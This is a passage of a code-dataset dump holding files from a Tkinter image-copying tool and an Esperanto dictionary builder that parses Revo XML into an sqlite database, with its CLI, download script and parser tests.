title.pack(side=TOP, fill=X, expand=NO)\n\n date= Checkbutton(\n frm, text=\"Created file date\", padx=20,\n anchor=W, variable=self.cb_date, command=self.options_cmd)\n date.pack(side=TOP, fill=X, expand=NO)\n\n time= Checkbutton(\n frm, text=\"Created file time\", padx=20,\n anchor=W, variable=self.cb_time, command=self.options_cmd)\n time.pack(side=TOP, fill=X, expand=NO)\n\n user = Checkbutton(\n frm, text=\"User description \", padx=20,\n anchor=W, variable=self.cb_user, command=self.options_cmd)\n user.pack(side=TOP, fill=X, expand=NO)\n\n name = Checkbutton(\n frm, text=\"Source file name \", padx=20,\n anchor=W, variable=self.cb_name, command=self.options_cmd)\n name.pack(side=TOP, fill=X, expand=NO)\n \n\n\ndef main():\n \"\"\"Main function\"\"\"\n root = Tk()\n root.title(\"ImageCopy\")\n control = ImageCopyController(root)\n root.mainloop()\n \nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.548858642578125, "alphanum_fraction": 0.5580697059631348, "avg_line_length": 30.40880584716797, "blob_id": "feec2ed953d7f7d23766e0a0371e196d36125939", "content_id": "4d50145cfb0ce859e85c963da869666195b572ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4994, "license_type": "no_license", "max_line_length": 90, "num_lines": 159, "path": "/ImageScale.py", "repo_name": "peverett/ImageCopy", "src_encoding": "UTF-8", "text": "import sys\nif sys.version_info[0] > 2:\n import tkinter.font as tkFont\n from tkinter import *\n from tkinter import messagebox, filedialog\nelse:\n import tkFont\n from Tkinter import *\nfrom PIL import Image, ImageTk\n\ndef invfrange(start, stop, step):\n \"\"\"Inverted (reverse) range inclusive of the final stop value, designed \n to work with floats.\"\"\"\n val = start\n vrange = []\n while val > stop:\n vrange.append(val)\n val = round(val - step, 2) # round to 2-decimal places.\n vrange.append(stop)\n return vrange\n\nclass ImageCanvas:\n def __init__(self, root):\n self.root = root\n self.image_id = None\n self.scale_range = []\n\n self.hsb = Scrollbar(root, orient='horizontal')\n self.vsb = 
Scrollbar(root, orient='vertical')\n self.max_zoom_out = 4.0\n\n self.canvas = Canvas(\n root, \n bg='black', \n width=800, \n height=600,\n xscrollcommand=self.hsb.set,\n yscrollcommand=self.vsb.set\n )\n self.canvas.pack(side=TOP, fill='both', expand='yes')\n self.canvas.update()\n \n self.hsb.configure(command=self.canvas.xview)\n self.vsb.configure(command=self.canvas.yview)\n\n self.canvas.bind('<Enter>', self.enter)\n self.canvas.bind('<Leave>', self.leave)\n self.canvas.bind('<Configure>', self.resize)\n\n self.image = None\n self.scale_idx = 0\n self.scale_range = []\n\n def load_image(self, image_path):\n \"\"\"Load the image indicated\"\"\"\n self.image = Image.open(image_path)\n self.calc_scale_range(self.image.size)\n self.scale_idx = len(self.scale_range)-1\n self.show_image()\n\n def move_from(self, event):\n ''' Remember previous coordinates for scrolling with the mouse '''\n self.canvas.scan_mark(event.x, event.y)\n\n def move_to(self, event):\n ''' Drag (move) canvas to the new position '''\n self.canvas.scan_dragto(event.x, event.y, gain=1)\n\n def enter(self, event):\n self.canvas.bind('<ButtonPress-1>', self.move_from)\n self.canvas.bind('<B1-Motion>', self.move_to)\n self.canvas.bind_all('<MouseWheel>', self.zoom)\n\n def leave(self, event):\n self.canvas.unbind('<ButtonPress-1>')\n self.canvas.unbind('<B1-Motion>')\n self.canvas.unbind_all('<MouseWheel>')\n\n def zoom_in(self):\n \"\"\"Make the image bigger up to actual size\"\"\"\n if self.scale_idx > 0:\n self.scale_idx -= 1\n self.show_image()\n\n def zoom_out(self):\n \"\"\"Make image smaller down to size of canvas\"\"\"\n if self.scale_idx < (len(self.scale_range) - 1):\n self.scale_idx = self.scale_idx + 1\n self.show_image()\n\n def zoom(self, event):\n '''Resize and display the image''' \n if event.delta == 120: # Mouse wheel up\n self.zoom_in()\n if event.delta == -120: # mouse wheel down\n self.zoom_out()\n\n #self.canvas.scale( \n # 'all',\n # self.canvas.canvasx(event.x),\n # self.canvas.canvasy(event.y),\n # self.scale_range[self.scale_idx], \n # self.scale_range[self.scale_idx]\n # )\n\n def show_image(self):\n \"\"\"Show image on the canvas\"\"\"\n if self.image_id:\n self.canvas.delete(self.image_id)\n\n width, height = self.image.size\n cw = self.canvas.winfo_width()\n ch = self.canvas.winfo_height()\n\n nw = int(width * self.scale_range[self.scale_idx])\n nh = int(height * self.scale_range[self.scale_idx])\n self.imagetk = ImageTk.PhotoImage(\n self.image.resize( (nw, nh), Image.ANTIALIAS )\n )\n\n ow = (cw - nw) / 2 if nw < cw else 0\n oh = (ch - nh) / 2 if nh < ch else 0\n\n self.image_id = self.canvas.create_image(ow , oh, image=self.imagetk, anchor='nw')\n self.canvas.configure(scrollregion=self.canvas.bbox('all'))\n\n\n def calc_scale_range(self, size):\n width, height = size\n cw = self.canvas.winfo_width()\n ch = self.canvas.winfo_height()\n\n if height < ch and width < cw:\n self.scale_range = [ 1.0 ]\n else:\n wratio = float(cw) / width\n hratio = float(ch) / height\n min_scale = round( min(wratio, hratio), 4)\n self.scale_range = invfrange(1.0, min_scale, 0.2)\n self.scale_idx = len(self.scale_range) - 1\n\n def resize(self, event):\n self.calc_scale_range(self.image.size)\n self.scale_idx = len(self.scale_range)-1\n self.show_image()\n\n def get_zoom(self):\n return int( self.scale_range[ self.scale_idx ] * 100.0 )\n\n \ndef main():\n root = Tk()\n root.title(\"Image Zoom\")\n im = ImageCanvas(root)\n im.load_image(\"./TestImage.jpg\")\n root.mainloop()\n\nif __name__ == \"__main__\":\n 
main()\n" }, { "alpha_fraction": 0.7471655607223511, "alphanum_fraction": 0.7471655607223511, "avg_line_length": 45.421051025390625, "blob_id": "3c2c132bed92bb2d4ba845328b05b3da7f86664e", "content_id": "09e4a061e47c0e6048a3fc0162abbddf809fa0cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 882, "license_type": "no_license", "max_line_length": 101, "num_lines": 19, "path": "/README.md", "repo_name": "peverett/ImageCopy", "src_encoding": "UTF-8", "text": "# ImageCopy\n\nCopy image files from a memory card or USB stick that conform to the [Design \nrule for Camera File System (DCF)](https://en.wikipedia.org/wiki/Design_rule_for_Camera_File_system).\n\nThat means that\n* Images will be under a 'DCIM' folder (**D**igital **C**amera **IM**ages).\n* Images will be in [JPEG](https://en.wikipedia.org/wiki/JPEG) format.\n* Images will contain [EXIF](https://en.wikipedia.org/wiki/Exif) data.\n\nThe application will allow the user to:\n* Allow the user to define a default local path to copy the image to\n* Allow the user to rename the file automatically when copied to contain the \n date and time the image was taken, taken from the EXIF data of the image.\n* Allow the user to go through the images one at a time, selectively copying \n an image at a time. \n* Allow the user to append to the new filename\n\nApplication to be implemented in Python.\n" } ]
3
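The ImageCopy record above derives its destination file name in `update_destination()` from the source file's creation timestamp (`os.path.getctime`), an optional user description and the source name, joined with underscores. The sketch below restates that scheme for clarity; it is an editorial illustration only, and the function name and signature are assumptions rather than the application's API.

```python
# Sketch of ImageCopy's destination-naming scheme (not the application's own code).
import os
from datetime import datetime

def build_copy_name(src_path, dest_dir, use_date=True, use_time=True, descr=""):
    created = datetime.fromtimestamp(os.path.getctime(src_path))
    parts = []
    if use_date:
        parts.append(created.strftime("%Y%m%d"))   # e.g. 20190627
    if use_time:
        parts.append(created.strftime("%H%M%S"))   # e.g. 160114
    if descr:
        parts.append(descr)                        # optional user description
    parts.append(os.path.splitext(os.path.basename(src_path))[0])
    return os.path.join(dest_dir, "_".join(parts) + ".jpg")

# e.g. build_copy_name("DCIM/IMG_0042.jpg", "/photos")
#      -> "/photos/20190627_160114_IMG_0042.jpg"
```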
djuretic/praktika-vortaro-dicts
https://github.com/djuretic/praktika-vortaro-dicts
4c5f144f5df80e86b4b7bf312acbf14be0c3d6ce
6e60e36dea4f6b11aeb8067034f4fd37a5cd346f
09976da084c52818c3663b82bd714793dcb66d2d
refs/heads/master
2022-12-20T17:23:35.658888
2022-12-16T19:09:32
2022-12-16T19:09:32
113,715,278
1
0
null
2017-12-10T01:59:06
2022-12-05T15:08:20
2022-12-05T15:13:08
Python
[ { "alpha_fraction": 0.7323943376541138, "alphanum_fraction": 0.7323943376541138, "avg_line_length": 27.399999618530273, "blob_id": "d80598885b3f82552d2ef0d8918c90f465692a07", "content_id": "349a945fae8e9066bf8491a89910c05c624b99e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 47, "num_lines": 5, "path": "/wrapper.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "# For profiling with Scalene:\n# scalene wrapper.py process_revo\nfrom runpy import run_module\n\nrun_module(\"eo_dicts.cli\", run_name=\"__main__\")\n" }, { "alpha_fraction": 0.7441613674163818, "alphanum_fraction": 0.747346043586731, "avg_line_length": 57.875, "blob_id": "568f9d9ff2a1c164c1aa668e4d2b755c38811092", "content_id": "cdf54b88ebb3596902633b72984c22dc69939a44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 942, "license_type": "no_license", "max_line_length": 124, "num_lines": 16, "path": "/download_revo.sh", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "#/usr/bin/env bash\nset -o errexit\nset -o nounset\nZIP_URL=$(lynx -nonumbers -dump -listonly https://github.com/revuloj/revo-fonto/tags | grep \"tags/\" | grep \"zip\" | head -n1)\nwget -O revoxml.zip $ZIP_URL\n# this will include trailing slash\nZIP_ROOT_DIR=$(unzip -l revoxml.zip | sed -n \"5p\" | awk -F\" \" '{print $4}')\nrm -rf revo/xml\nunzip -jo revoxml.zip \"${ZIP_ROOT_DIR}revo/*\" -d \"revo/xml/\"\n\nwget -O revo/dtd/vokomll.dtd https://raw.githubusercontent.com/revuloj/voko-grundo/master/dtd/vokomll.dtd\nwget -O revo/dtd/vokourl.dtd https://raw.githubusercontent.com/revuloj/voko-grundo/master/dtd/vokourl.dtd\nwget -O revo/dtd/vokosgn.dtd https://raw.githubusercontent.com/revuloj/voko-grundo/master/dtd/vokosgn.dtd\nwget -O revo/cfg/lingvoj.xml https://raw.githubusercontent.com/revuloj/voko-grundo/master/cfg/lingvoj.xml\nwget -O revo/cfg/fakoj.xml https://raw.githubusercontent.com/revuloj/voko-grundo/master/cfg/fakoj.xml\ndate +%F > revo/VERSION\n" }, { "alpha_fraction": 0.6760563254356384, "alphanum_fraction": 0.7323943376541138, "avg_line_length": 23, "blob_id": "ea4472238a5b1adfc0b0bf3cd44593d96299215f", "content_id": "490d7e10b5280b0845e026c6b9f2dc12ea6cab5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 71, "license_type": "no_license", "max_line_length": 40, "num_lines": 3, "path": "/.flake8", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "# still no support for pyproject.toml :(\n[flake8]\nmax-line-length = 102" }, { "alpha_fraction": 0.5610134601593018, "alphanum_fraction": 0.5667011141777039, "avg_line_length": 28.75384521484375, "blob_id": "322586182a46eae7c0d524fe7d2dbd18d12bcf09", "content_id": "2f68cff394f26cd66492f9d8be21f0a7c0d5bd4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 71, "num_lines": 65, "path": "/eo_dicts/search.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import sqlite3\nimport os\nimport humanize\nfrom .utils import output_dir\n\n\ndef search_multiple(*words: str) -> None:\n for word in words:\n search(word)\n\n\ndef search(word: str) -> None:\n db_filename = os.path.join(output_dir(), \"vortaro.db\")\n conn = sqlite3.connect(db_filename)\n 
conn.row_factory = sqlite3.Row\n cursor = conn.cursor()\n try:\n for row in cursor.execute(\n \"\"\"\n SELECT *\n FROM words w\n LEFT JOIN definitions d ON (w.definition_id = d.id)\n WHERE word = ?\n \"\"\",\n (word,),\n ):\n for field, value in dict(row).items():\n print(\"%s: %s\" % (field, repr(value)))\n print(\"\")\n finally:\n cursor.close()\n conn.close()\n\n\ndef stats() -> None:\n db_filename = os.path.join(output_dir(), \"vortaro.db\")\n conn = sqlite3.connect(db_filename)\n conn.row_factory = sqlite3.Row\n cursor = conn.cursor()\n try:\n cursor.execute(\"SELECT * FROM version\")\n print(\"Version:\", cursor.fetchone()[0])\n\n file_size = os.path.getsize(db_filename)\n print(\"Size:\", humanize.naturalsize(file_size), \"-\", file_size)\n\n cursor.execute(\"SELECT COUNT(*) FROM words\")\n print(\"Words:\", cursor.fetchone()[0])\n\n cursor.execute(\"SELECT COUNT(*) FROM definitions\")\n print(\"Definitions:\", cursor.fetchone()[0])\n\n cursor.execute(\"SELECT COUNT(*) FROM languages\")\n print(\"Languages:\", cursor.fetchone()[0])\n\n cursor.execute(\"SELECT COUNT(*) FROM translations_es\")\n translations_es = cursor.fetchone()[0]\n cursor.execute(\"SELECT COUNT(*) FROM translations_en\")\n translations_en = cursor.fetchone()[0]\n print(\"Translations:\")\n print(\"\\tEnglish:\", translations_en)\n print(\"\\tSpanish:\", translations_es)\n finally:\n cursor.close()\n conn.close()\n" }, { "alpha_fraction": 0.7641128897666931, "alphanum_fraction": 0.7641128897666931, "avg_line_length": 16.13793182373047, "blob_id": "e68106ea9027004b8ad126d532f01ba0a93cd0ff", "content_id": "a962ceac7cd4cd4872247e4e8fe11977672fbd17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 496, "license_type": "no_license", "max_line_length": 73, "num_lines": 29, "path": "/README.md", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "# Dictionary files for Praktika Vortaro\n\n## Generating the database\n\nInstall the dependencies, download the dictionary files and process them:\n\n```bash\ngit submodule init && git submodule update\npip install pipenv\npipenv install\n# if using pyenv\npyenv rehash\npraktika_vortaro process_revo\n```\n\nThis will generate the sqlite database `output/vortaro.db`.\n\nTo download the most recent data files from Revo:\n\n```bash\n./download_revo.sh\npraktika_vortaro process_revo\n```\n\n## Tests\n\n```bash\npytest\n```" }, { "alpha_fraction": 0.5308510661125183, "alphanum_fraction": 0.5356382727622986, "avg_line_length": 25.478872299194336, "blob_id": "266a67b7254d3f3c66b9b717a53e8b92bd617e29", "content_id": "3d453e3766010eacc9030dbc6ba8da3afc3f2e36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1900, "license_type": "no_license", "max_line_length": 84, "num_lines": 71, "path": "/eo_dicts/utils.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as ET\nimport os\nfrom typing import Optional, Iterator, TypeVar, Iterable\n\nT = TypeVar(\"T\")\n\nMAPPING = {\n \"C\": \"Ĉ\",\n \"G\": \"Ĝ\",\n \"H\": \"Ĥ\",\n \"J\": \"Ĵ\",\n \"S\": \"Ŝ\",\n \"U\": \"Ŭ\",\n \"c\": \"ĉ\",\n \"g\": \"ĝ\",\n \"h\": \"ĥ\",\n \"j\": \"ĵ\",\n \"s\": \"ŝ\",\n \"u\": \"ŭ\",\n}\n\n\ndef add_hats(word: str) -> str:\n if not word or len(word) == 1:\n return word\n res = \"\"\n pos = 0\n while pos < len(word) - 1:\n char = word[pos]\n if char in MAPPING.keys() and word[pos + 1] in (\"x\", \"X\"):\n res 
+= MAPPING[char]\n pos += 2\n else:\n res += char\n pos += 1\n if pos == len(word) - 1:\n res += word[-1]\n return res\n\n\ndef get_languages() -> list[dict[str, Optional[str]]]:\n base_dir = os.path.dirname(__file__)\n xml_path = os.path.join(base_dir, \"..\", \"revo\", \"cfg\", \"lingvoj.xml\")\n tree = ET.parse(xml_path)\n langs = tree.findall(\"lingvo\")\n alphabet = \"abcĉdefgĝhĥijĵklmnoprsŝtuŭvz/-\"\n # normal sort puts ĉ, ĝ,... at the end\n langs = sorted(langs, key=lambda x: [alphabet.index(c) for c in (x.text or \"\")])\n return [{\"code\": lang.get(\"kodo\"), \"name\": lang.text} for lang in langs]\n\n\ndef get_disciplines() -> dict[str, Optional[str]]:\n base_dir = os.path.dirname(__file__)\n xml_path = os.path.join(base_dir, \"..\", \"revo\", \"cfg\", \"fakoj.xml\")\n tree = ET.parse(xml_path)\n return {node.get(\"kodo\") or \"\": node.text for node in tree.findall(\"fako\")}\n\n\ndef list_languages() -> None:\n langs = get_languages()\n for n, lang in enumerate(langs, 1):\n print(n, lang[\"code\"], lang[\"name\"])\n\n\ndef letter_enumerate(iterable: Iterable[T]) -> Iterator[tuple[str, T]]:\n for n, elem in enumerate(iterable):\n yield (chr(ord(\"a\") + n), elem)\n\n\ndef output_dir() -> str:\n return os.path.join(os.path.dirname(__file__), \"..\", \"output\")\n" }, { "alpha_fraction": 0.5387977957725525, "alphanum_fraction": 0.5420765280723572, "avg_line_length": 19.795454025268555, "blob_id": "3559544a225c1b8d658f79c134eea1a9cee344c5", "content_id": "fa177cdcebbe197e0752a2befe86fce12ec0cabd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 915, "license_type": "no_license", "max_line_length": 47, "num_lines": 44, "path": "/eo_dicts/cli.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import fire\nfrom . 
import process_revo\nfrom .utils import list_languages\nfrom .search import search_multiple, stats\nfrom typing import Optional\n\n\nclass Vortaro(object):\n def show_languages(self):\n list_languages()\n\n def search(self, *words: str):\n search_multiple(*words)\n\n def stats(self):\n stats()\n\n def process_revo(\n self,\n word: Optional[str] = None,\n xml_file: Optional[str] = None,\n output_db: str = \"vortaro.db\",\n limit: Optional[int] = None,\n verbose: bool = False,\n dry_run: bool = False,\n min_entries_to_include_lang: int = 100,\n ):\n process_revo.main(\n word,\n xml_file,\n output_db,\n limit,\n verbose,\n dry_run,\n min_entries_to_include_lang,\n )\n\n\ndef main():\n fire.Fire(Vortaro)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.4915655553340912, "alphanum_fraction": 0.49906283617019653, "avg_line_length": 28.297687530517578, "blob_id": "e9da4afe2b905f73a6bb6a593aa47fdd916c49f7", "content_id": "ee24420fdfe0670572021caec37d8b4b5ac6e838", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10175, "license_type": "no_license", "max_line_length": 102, "num_lines": 346, "path": "/eo_dicts/tests/test_parser.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "from ..parser.revo import Art, Snc, Dif, Drv, Subart, Refgrp\nfrom lxml import etree\nimport pytest\n\n\[email protected]\ndef parser():\n return lambda xml: etree.fromstring(xml)\n\n\ndef test_set_parent(parser):\n xml = \"\"\"<art>\n <kap>-<rad>aĉ</rad>/</kap>\n <subart>\n <drv><kap>-<tld/></kap></drv>\n </subart>\n </art>\"\"\"\n art = Art(parser(xml))\n for tag in art.children:\n assert tag.parent == art\n\n\ndef test_article_kap(parser):\n xml = \"\"\"<art>\n <kap>\n <ofc>1</ofc>\n -<rad>aĉ</rad>/ <fnt><bib>PV</bib></fnt>\n </kap>\n </art>\"\"\"\n assert Art(parser(xml)).kap == (\"aĉ\", \"/\")\n\n\ndef test_article_no_drv(parser):\n xml = \"\"\"<art>\n <kap><rad>al</rad></kap>\n <subart>\n <dif>Prefikso kun la senco <tld/><sncref ref=\"al.0.prep_proksimigxo\"/></dif>:\n <snc ref=\"al.0.prep_proksimigxo\">\n <ekz><ind><tld/>veni</ind>, <tld/>kuri <tld/>porti, <tld/>esti.</ekz>\n </snc>\n </subart>\n </art>\"\"\"\n derivs = list(Art(parser(xml)).derivations())\n assert len(derivs) == 1\n assert derivs[0].__class__ is Subart\n parsed = derivs[0].to_text()\n assert (\n parsed.string == \"Prefikso kun la senco al: \\nalveni, alkuri alporti, alesti.\"\n )\n assert parsed.format == {\n \"ekz\": [(27, 58)],\n \"tld\": [(27, 29), (35, 37), (42, 44), (51, 53)],\n }\n\n\ndef test_drv_multiple_kap(parser):\n xml = \"\"\"<drv mrk=\"ajn.sen0a\"><kap>sen <tld/>a, <var><kap>sen ia <tld/></kap></var></kap></drv>\"\"\"\n assert Drv(parser(xml), {\"radix\": \"ajn\"}).kap == \"sen ajna, sen ia ajn\"\n\n\ndef test_drv_kap(parser):\n xml = '<drv mrk=\"a1.0.volvita\"><kap><tld/> volvita</kap></drv>'\n assert Drv(parser(xml), {\"radix\": \"a\"}).kap == \"a volvita\"\n\n\ndef test_drv_main_word_multiple(parser):\n xml = '<drv mrk=\"abort.0ajxo\"><kap><tld/>aĵo, <var><kap><tld/>ulo</kap></var></kap></drv>'\n assert Drv(parser(xml), {\"radix\": \"abort\"}).main_word() == \"abortaĵo, abortulo\"\n\n\ndef test_drv_whitespace_after_gra_and_ref(parser):\n xml = \"\"\"<drv mrk=\"abol.0i\">\n <kap><tld/>i</kap>\n <gra><vspec>tr</vspec></gra>\n <snc mrk=\"abol.0i.JUR\">\n <uzo tip=\"fak\">JUR</uzo>\n <ref tip=\"dif\" cel=\"abolic.0i\">abolicii</ref>\n <ekz>\n sklaveco estis <tld/>ita en Brazilo en 1888.\n </ekz>\n </snc>\n </drv>\"\"\"\n 
assert (\n Drv(parser(xml), {\"radix\": \"abol\"}).to_text().string\n == \"(tr) JUR = abolicii \\nsklaveco estis abolita en Brazilo en 1888. \"\n )\n\n\ndef test_subdrv(parser):\n xml = \"\"\"<drv mrk=\"ad.0\">\n <kap><ofc>*</ofc>-<tld/></kap>\n <dif>Sufikso esprimanta ĝenerale la agon kaj uzata por derivi:</dif>\n <subdrv>\n <dif>\n substantivojn:\n </dif>\n </subdrv>\n </drv>\"\"\"\n assert (\n Drv(parser(xml), {\"radix\": \"ad\"}).to_text().string\n == \"Sufikso esprimanta ĝenerale la agon kaj uzata por derivi:\\n\\nA. substantivojn: \"\n )\n\n\ndef test_subdrv_snc(parser):\n xml = \"\"\"<drv mrk=\"ir.0ado\">\n <kap><tld/>ado, <var><kap><tld/>o</kap></var></kap>\n <subdrv>\n <dif>\n Ago <tld/>i:\n </dif>\n <snc mrk=\"ir.0ado.deAL\"><ekz>Frazo</ekz></snc>\n <snc mrk=\"ir.0ado.al\"><ekz>Alia frazo</ekz></snc>\n </subdrv>\n <subdrv><dif>Maniero (...)</dif></subdrv>\n </drv>\n \"\"\"\n assert (\n Drv(parser(xml), {\"radix\": \"ir\"}).to_text().string\n == \"A. Ago iri: \\n\\n1. \\nFrazo\\n\\n2. \\nAlia frazo\\n\\nB. Maniero (...)\"\n )\n\n\ndef test_snc_single(parser):\n xml = \"\"\"<snc mrk=\"abak.0o.ARKI\">\n <uzo tip=\"fak\">ARKI</uzo>\n <dif>\n Supera plata parto de kolona\n <ref tip=\"vid\" cel=\"kapite.0o\">kapitelo</ref>.\n </dif>\n </snc>\"\"\"\n assert (\n Snc(parser(xml)).to_text().string\n == \"ARKI Supera plata parto de kolona kapitelo. \"\n )\n\n\ndef test_snc_no_tail_after_tld(parser):\n assert (\n Snc(parser('<snc mrk=\"abat.0o\"><dif><tld/></dif></snc>'), {\"radix\": \"abat\"})\n .to_text()\n .string\n == \"abat\"\n )\n\n\ndef test_snc_ignore_fnt(parser):\n xml = (\n '<snc mrk=\"-\"><dif>Difino <ekz>Frazo<fnt><aut>Iu</aut></fnt>.</ekz></dif></snc>'\n )\n assert Snc(parser(xml)).to_text().string == \"Difino \\nFrazo.\"\n\n\ndef test_snc_ignore_trd(parser):\n xml = '<snc mrk=\"-\"><dif>Difino <ekz><ind>Frazo</ind>.<trd lng=\"hu\">Trd</trd></ekz></dif></snc>'\n tag = Snc(parser(xml)).to_text()\n assert tag.string == \"Difino \\nFrazo.\"\n assert tag.format == {\"ekz\": [(8, 14)]}\n\n\ndef test_snc_replace_tld(parser):\n xml = \"\"\"<snc mrk=\"abat.0o\">\n <dif>Monaĥejestro de <tld/>ejo.</dif>\n </snc>\"\"\"\n assert (\n Snc(parser(xml), {\"radix\": \"abat\"}).to_text().string\n == \"Monaĥejestro de abatejo.\"\n )\n\n\ndef test_snc_replace_tld_lit(parser):\n xml = \"\"\"<snc mrk=\"abat.0o\">\n <dif>Monaĥejestro de <tld lit=\"A\"/>ejo.</dif>\n </snc>\"\"\"\n assert (\n Snc(parser(xml), {\"radix\": \"abat\"}).to_text().string\n == \"Monaĥejestro de Abatejo.\"\n )\n\n\ndef test_snc_whitespace(parser):\n xml = \"\"\"<snc>\n <dif>\n Amata:\n <ekz>\n <tld/>a patrino;\n </ekz>\n <ekz>\n nia <ind><tld/>memora</ind> majstro\n </ekz>\n </dif></snc>\n \"\"\"\n assert (\n Snc(parser(xml), {\"radix\": \"kar\"}).to_text().string\n == \"Amata: \\nkara patrino; \\nnia karmemora majstro \"\n )\n\n\ndef test_snc_no_more_whitespace_after_ref(parser):\n xml = \"\"\"<snc>\n <dif>\n <ref tip=\"lst\" cel=\"famili.0o.BIO\"\n lst=\"voko:zoologiaj_familioj\">Familio</ref> el la ordo\n <ref tip=\"malprt\" cel=\"best.rabo0oj\">rabobestoj</ref>\n (<trd lng=\"la\">Canidae</trd>).\n </dif>\n </snc>\"\"\"\n assert (\n Snc(parser(xml), {\"radix\": \"hunded\"}).to_text().string\n == \"Familio el la ordo rabobestoj (Canidae). 
\"\n )\n\n\ndef test_subsnc(parser):\n xml = \"\"\"<snc mrk=\"-\">\n <dif>Uzata kiel:</dif>\n <subsnc><dif>A</dif></subsnc>\n <subsnc><dif>B</dif></subsnc>\n </snc>\"\"\"\n assert Snc(parser(xml)).to_text().string == \"Uzata kiel:\\n\\na) A\\n\\nb) B\"\n\n\ndef test_multiple_snc(parser):\n xml = \"\"\"<art>\n <kap><rad>zon</rad>/o</kap>\n <drv mrk=\"zon.0o\">\n <kap><ofc>*</ofc><tld/>o</kap>\n <snc mrk=\"zon.0o.TEKS\"><dif>A</dif></snc>\n <snc mrk=\"zon.0o.korpo\"><dif>B</dif></snc>\n </drv>\n </art>\n \"\"\"\n drvs = [d.to_text().string for d in Art(parser(xml)).derivations()]\n assert drvs == [\"1. A\\n\\n2. B\"]\n\n\ndef test_dif_space_between_elements(parser):\n xml = \"\"\"<dif>\n <ref tip=\"dif\" cel=\"fin.0ajxo.GRA\">Finaĵo</ref>\n (lingvoscience: sufikso)\n </dif>\"\"\"\n assert Dif(parser(xml)).to_text().string == \"Finaĵo (lingvoscience: sufikso) \"\n\n\ndef test_trd_inside_ekz(parser):\n xml = \"\"\"<art>\n <kap><rad>abstin</rad>/i</kap>\n <drv mrk=\"abstin.0i\">\n <kap><tld/>i</kap>\n <gra><vspec>ntr</vspec></gra>\n <snc>\n <dif>Trinki ion pro medicina motivo:\n <ekz>\n <ind><tld/>ulo</ind>;\n <trd lng=\"ca\">abstinent<klr> (subst.)</klr></trd>\n <trdgrp lng=\"hu\">\n <trd>absztinens</trd>,\n <trd>önmegtartóztatás;</trd>\n </trdgrp>\n <trd lng=\"es\">abstemio</trd>\n </ekz>\n </dif>\n </snc>\n <trd lng=\"en\">abstain</trd>\n </drv>\n </art>\"\"\"\n derivs = list(Art(parser(xml)).derivations())\n assert len(derivs) == 1\n trds = derivs[0].translations()\n assert trds == {\n \"abstini\": {\"en\": {None: [\"abstain\"]}},\n # 'abstinulo': {\n # 'ca': ['abstinent (subst.)'],\n # 'hu': ['absztinens', 'önmegtartóztatás'],\n # 'es': ['abstemio']},\n }\n\n\ndef test_trd_preserves_whitespace(parser):\n # pl words come from abdiki\n xml = \"\"\"<drv mrk=\"telefo.posx0o\">\n <kap>poŝ<tld/>o</kap>\n <trdgrp lng=\"es\">\n <trd><klr tip=\"amb\">teléfono</klr> <ind>móvil</ind></trd>,\n <trd><klr tip=\"amb\">teléfono</klr> <ind>celular</ind></trd>\n </trdgrp>\n <trdgrp lng=\"pl\">\n <trd><klr>dać </klr>dymisję</trd>\n </trdgrp>\n </drv>\"\"\"\n drv = Drv(parser(xml), {\"radix\": \"telefon\"})\n trds = drv.translations()\n assert trds == {\n \"poŝtelefono\": {\n \"es\": {None: [\"teléfono móvil\", \"teléfono celular\"]},\n \"pl\": {None: [\"dać dymisję\"]},\n }\n }\n\n\ndef test_trd_inside_snc(parser):\n xml = \"\"\"<drv mrk=\"brik.0o\">\n <kap><ofc>*</ofc><tld/>o</kap>\n <snc mrk=\"brik.0o.bakita\">\n <trd lng=\"en\">brick</trd>\n </snc>\n <snc mrk=\"brik.0o.FIG_elemento\"></snc>\n <snc mrk=\"brik.0o.formo\">\n <trd lng=\"en\">block</trd>\n </snc>\n </drv>\"\"\"\n drv = Drv(parser(xml), {\"radix\": \"brik\"})\n trds = drv.translations()\n assert trds == {\"briko\": {\"en\": {1: [\"brick\"], 3: [\"block\"]}}}\n\n\ndef test_trd_inside_only_snc(parser):\n xml = \"\"\"<drv mrk=\"cxili.CX0o\">\n <kap><tld/>o</kap>\n <snc><trd lng=\"da\">Chile</trd></snc>\n </drv>\"\"\"\n drv = Drv(parser(xml), {\"radix\": \"cxili\"})\n assert drv.translations() == {\"ĉilio\": {\"da\": {None: [\"Chile\"]}}}\n\n\ndef test_trd_multiple_kap(parser):\n xml = \"\"\"<drv mrk=\"arab.SaudaA0ujo\">\n <kap>Sauda <tld lit=\"A\"/>ujo,\n <var><kap>Saud-<tld lit=\"A\"/>ujo</kap></var>,\n <var><kap>Saŭda <tld lit=\"A\"/>ujo</kap></var>\n </kap>\n <trd lng=\"pl\">Arabia Saudyjska</trd>\n </drv>\"\"\"\n drv = Drv(parser(xml), {\"radix\": \"arab\"})\n assert drv.translations() == {\n \"Sauda Arabujo, Saud-Arabujo, Saŭda Arabujo\": {\n \"pl\": {None: [\"Arabia Saudyjska\"]}\n }\n }\n\n\ndef 